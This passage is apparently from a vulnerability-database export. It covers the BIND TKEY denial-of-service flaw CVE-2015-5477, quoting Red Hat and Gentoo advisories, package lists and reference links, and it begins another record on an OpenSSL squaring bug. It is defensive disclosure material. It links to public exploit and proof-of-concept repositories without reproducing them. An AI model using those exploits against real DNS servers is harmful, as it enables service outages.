6.4):\n\nSource:\nbind-9.8.2-0.17.rc1.el6_4.7.src.rpm\n\ni386:\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-sdb-9.8.2-0.17.rc1.el6_4.7.i686.rpm\n\nppc64:\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.ppc.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\nbind-sdb-9.8.2-0.17.rc1.el6_4.7.ppc64.rpm\n\ns390x:\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.s390.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\nbind-sdb-9.8.2-0.17.rc1.el6_4.7.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.i686.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\nbind-sdb-9.8.2-0.17.rc1.el6_4.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.2.src.rpm\n\ni386:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.2.i686.rpm\n\nppc64:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.ppc.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.2.ppc64.rpm\n\ns390x:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.s390.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.2.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.i686.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8500\nhttps://access.redhat.com/security/cve/CVE-2015-5477\nhttps://access.redhat.com/security/cve/CVE-2015-5722\nhttps://access.redhat.com/security/cve/CVE-2015-8000\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://kb.isc.org/article/AA-01216\nhttps://kb.isc.org/article/AA-01272\nhttps://kb.isc.org/article/AA-01287\nhttps://kb.isc.org/article/AA-01317\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWqhylXlSAg2UNWIIRAqZ/AKCoKFjvPavmvpq8cC3SSEMtpGtycQCfShgo\n0jc/9uvkc44V3h5ZDR/fILQ=\n=90gw\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-dns/bind \u003c 9.10.2_p4 \u003e= 9.10.2_p4 \n\nDescription\n===========\n\nA vulnerability has been discovered in BIND\u0027s named utility leading to\na Denial of Service condition. \n\nImpact\n======\n\nA remote attacker may be able to cause Denial of Service condition via\nspecially constructed zone data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll BIND users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-9.10.2_p4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-1349\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1349\n[ 2 ] CVE-2015-4620\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4620\n[ 3 ] CVE-2015-5477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5477\n[ 4 ] CVE-2015-5722\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5722\n[ 5 ] CVE-2015-5986\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5986\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201510-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n", "sources": [ { "db": "NVD", "id": "CVE-2015-5477" }, { "db": "BID", "id": "76092" }, { "db": "VULMON", "id": "CVE-2015-5477" }, { "db": "PACKETSTORM", "id": "133242" }, { "db": "PACKETSTORM", "id": "133231" }, { "db": "PACKETSTORM", "id": "132876" }, { "db": "PACKETSTORM", "id": "133081" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "133507" }, { "db": "PACKETSTORM", "id": "135472" }, { "db": "PACKETSTORM", "id": "134008" } ], "trust": 1.98 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=37723", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5477" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-5477", "trust": 2.8 }, { "db": "ISC", "id": "AA-01272", "trust": 1.9 }, { "db": "JUNIPER", "id": "JSA10718", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10783", "trust": 1.4 }, { "db": "BID", "id": "76092", "trust": 1.4 }, { "db": "EXPLOIT-DB", "id": "37721", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "37723", "trust": 1.1 }, { "db": "ISC", "id": "AA-01305", "trust": 1.1 }, { "db": "ISC", "id": "AA-01306", "trust": 1.1 }, { "db": "ISC", "id": "AA-01307", "trust": 1.1 }, { "db": "ISC", "id": "AA-01438", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "132926", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10126", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033100", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201507-807", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2015-5477", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133242", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133231", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132876", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133081", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135505", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133507", "trust": 0.1 }, { "db": "ISC", "id": "AA-01317", "trust": 0.1 }, { "db": "ISC", "id": "AA-01216", "trust": 0.1 }, { "db": "ISC", "id": "AA-01287", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135472", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134008", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5477" }, { "db": "BID", "id": "76092" }, { "db": "PACKETSTORM", "id": "133242" }, { "db": "PACKETSTORM", "id": "133231" }, { "db": "PACKETSTORM", "id": "132876" }, { "db": "PACKETSTORM", "id": "133081" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "133507" }, { "db": "PACKETSTORM", "id": "135472" }, { "db": "PACKETSTORM", "id": "134008" }, { "db": "CNNVD", "id": "CNNVD-201507-807" }, { "db": "NVD", "id": "CVE-2015-5477" } ] }, "id": "VAR-201507-0037", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4593499042857143 }, "last_update_date": "2024-07-22T21:39:32.494000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Debian CVElist Bug Report Logs: bind9: CVE-2015-5477: An error in handling TKEY queries can cause named to exit with a REQUIRE assertion failure", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=72aa555886f251baf2a0e394069c44d4" }, { "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-2848: A packet with malformed options can trigger an assertion failure", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=dd4f6f8da1fe3001ac04ce05d33ac6e0" }, { "title": "Debian Security Advisories: DSA-3319-1 bind9 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=c8db294e6981a358dc6389c1d158b657" }, { "title": "Ubuntu Security Notice: bind9 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2693-1" }, { "title": "Amazon Linux AMI: ALAS-2015-573", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-573" }, { "title": "Red Hat: CVE-2015-5477", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-5477" }, { "title": "Apple: OS X Server v4.1.5", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=a9a4311d557110737edd921b56ef1a70" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=8b701aba68029ec36b631a8e26157a22" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "vaas-cve-2015-5477", "trust": 0.1, "url": "https://github.com/hmlio/vaas-cve-2015-5477 " }, { "title": "cve-2015-5477", "trust": 0.1, "url": "https://github.com/knqyf263/cve-2015-5477 " }, { "title": "cve-2015-5477", "trust": 0.1, "url": "https://github.com/robertdavidgraham/cve-2015-5477 " }, { "title": "ShareDoc_cve-2015-5477", "trust": 0.1, "url": "https://github.com/denmilu/sharedoc_cve-2015-5477 " }, { "title": "cve-2015-5477", "trust": 0.1, "url": "https://github.com/ilanyu/cve-2015-5477 " }, { "title": "tkeypoc", "trust": 0.1, "url": "https://github.com/elceef/tkeypoc " }, { "title": "ShareDoc", "trust": 0.1, "url": "https://github.com/jioundai/sharedoc " }, { "title": "awesome-c", "trust": 0.1, "url": "https://github.com/honeyzhaoaliyun/awesome-c " }, { "title": "awesome-c", "trust": 0.1, "url": "https://github.com/imcg/awesome-c " }, { "title": "CDL", "trust": 0.1, "url": "https://github.com/ncsu-dance-research-group/cdl " }, { "title": "Classified-Distributed-Learning-for-Detecting-Security-Attacks-in-Containerized-Applications", "trust": 0.1, "url": "https://github.com/yuhang-lin/classified-distributed-learning-for-detecting-security-attacks-in-containerized-applications " }, { "title": "afl-cve", "trust": 0.1, "url": "https://github.com/mrash/afl-cve " }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/08/04/bind_bug_exploits_now_in_the_wild/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/07/30/bind_remote_dos_vulnerability/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5477" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-19", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-5477" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.8, "url": "https://kb.isc.org/article/aa-01272" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1513.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0078.html" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201510-01" }, { "trust": 1.2, "url": "https://www.exploit-db.com/exploits/37723/" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3319" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1515.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1514.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2693-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00050.html" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05095918" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144181171013996\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144000632319155\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144294073801304\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144017354030745\u0026w=2" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/76092" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0079.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10718" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04952480" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html" }, { "trust": 1.1, "url": "https://kb.isc.org/article/aa-01306" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10126" }, { "trust": 1.1, "url": "https://kb.isc.org/article/aa-01305" }, { "trust": 1.1, "url": "https://kb.isc.org/article/aa-01307" }, { "trust": 1.1, "url": "https://support.apple.com/kb/ht205032" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04789415" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033100" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/132926/bind-tkey-query-denial-of-service.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/163015.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/163007.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/163006.html" }, { "trust": 1.1, "url": "https://kb.isc.org/article/aa-01438" }, { "trust": 1.1, "url": "https://kb.juniper.net/jsa10783" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/37721/" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20160114-0001/" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5477" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2015/q3/233" }, { "trust": 0.3, "url": "http://www.isc.org/products/bind/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10718\u0026actp=rss" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10783\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://support.apple.com/en-ie/ht205032" }, { "trust": 0.3, "url": "https://kb.netapp.com/support/index?page=content\u0026id=9010056\u0026actp=rss" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/135" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04789415" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04769567" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774040" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04800156" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21963712" }, { "trust": 0.3, "url": "https://www.us-cert.gov/ncas/current-activity/2015/09/16/internet-systems-consortium-isc-releases-security-updates-bind" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020890" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966274" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964491" }, { "trust": 0.3, "url": "https://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.3, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5722" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-5477" }, { "trust": 0.2, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumbe" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8500" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/19.html" }, { "trust": 0.1, "url": "https://github.com/hmlio/vaas-cve-2015-5477" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=40201" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2693-1/" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5477\u003e" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01272\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:17.bind.asc\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:17/bind.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:17/bind.patch" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8000" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8500" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01216" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01317" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://kb.isc.org/article/aa-01287" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5722" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8000" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4620" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1349" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5986" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4620" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5477" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5986" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1349" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-5477" }, { "db": "BID", "id": "76092" }, { "db": "PACKETSTORM", "id": "133242" }, { "db": "PACKETSTORM", "id": "133231" }, { "db": "PACKETSTORM", "id": "132876" }, { "db": "PACKETSTORM", "id": "133081" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "133507" }, { "db": "PACKETSTORM", "id": "135472" }, { "db": "PACKETSTORM", "id": "134008" }, { "db": "CNNVD", "id": "CNNVD-201507-807" }, { "db": "NVD", "id": "CVE-2015-5477" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-5477" }, { "db": "BID", "id": "76092" }, { "db": "PACKETSTORM", "id": "133242" }, { "db": "PACKETSTORM", "id": "133231" }, { "db": "PACKETSTORM", "id": "132876" }, { "db": "PACKETSTORM", "id": "133081" }, { "db": "PACKETSTORM", "id": "135505" }, { "db": "PACKETSTORM", "id": "133507" }, { "db": "PACKETSTORM", "id": "135472" }, { "db": "PACKETSTORM", "id": "134008" }, { "db": "CNNVD", "id": "CNNVD-201507-807" }, { "db": "NVD", "id": "CVE-2015-5477" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-07-29T00:00:00", "db": "VULMON", "id": "CVE-2015-5477" }, { "date": "2015-07-28T00:00:00", "db": "BID", "id": "76092" }, { "date": "2015-08-21T17:01:54", "db": "PACKETSTORM", "id": "133242" }, { "date": "2015-08-21T16:57:58", "db": "PACKETSTORM", "id": "133231" }, { "date": "2015-07-28T23:02:22", "db": "PACKETSTORM", "id": "132876" }, { "date": "2015-08-13T22:20:48", "db": "PACKETSTORM", "id": "133081" }, { "date": "2016-01-29T20:34:00", "db": "PACKETSTORM", "id": "135505" }, { "date": "2015-09-09T15:44:17", "db": "PACKETSTORM", "id": "133507" }, { "date": "2016-01-28T17:18:54", "db": "PACKETSTORM", "id": "135472" }, { "date": "2015-10-18T21:06:41", "db": "PACKETSTORM", "id": "134008" }, { "date": "2015-07-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201507-807" }, { "date": "2015-07-29T14:59:05.397000", "db": "NVD", "id": "CVE-2015-5477" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-10T00:00:00", "db": "VULMON", "id": "CVE-2015-5477" }, { "date": "2017-04-18T01:05:00", "db": "BID", "id": "76092" }, { "date": "2015-07-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201507-807" }, { "date": "2017-11-10T02:29:02.293000", "db": "NVD", "id": "CVE-2015-5477" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "132876" }, { "db": "PACKETSTORM", "id": "135472" }, { "db": "CNNVD", "id": "CNNVD-201507-807" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ISC BIND Denial of service vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201507-807" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "76092" } ], "trust": 0.3 } }
var-201501-0434
Vulnerability from variot
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c. OpenSSL is prone to an unspecified security weakness. Little is known about this issue or its effects at this time. We will update this BID as more information emerges. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following:
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain admin privileges without properly authenticating Description: An issue existed when checking XPC entitlements. This issue was addressed with improved entitlement checking. CVE-ID CVE-2015-1130 : Emil Kvarnhammar at TrueSec
apache Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in Apache Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.10 and 2.2.29, including one that may allow a remote attacker to execute arbitrary code. These issues were addressed by updating Apache to versions 2.4.10 and 2.2.29 CVE-ID CVE-2013-0118 CVE-2013-5704 CVE-2013-6438 CVE-2014-0098 CVE-2014-0117 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-3523
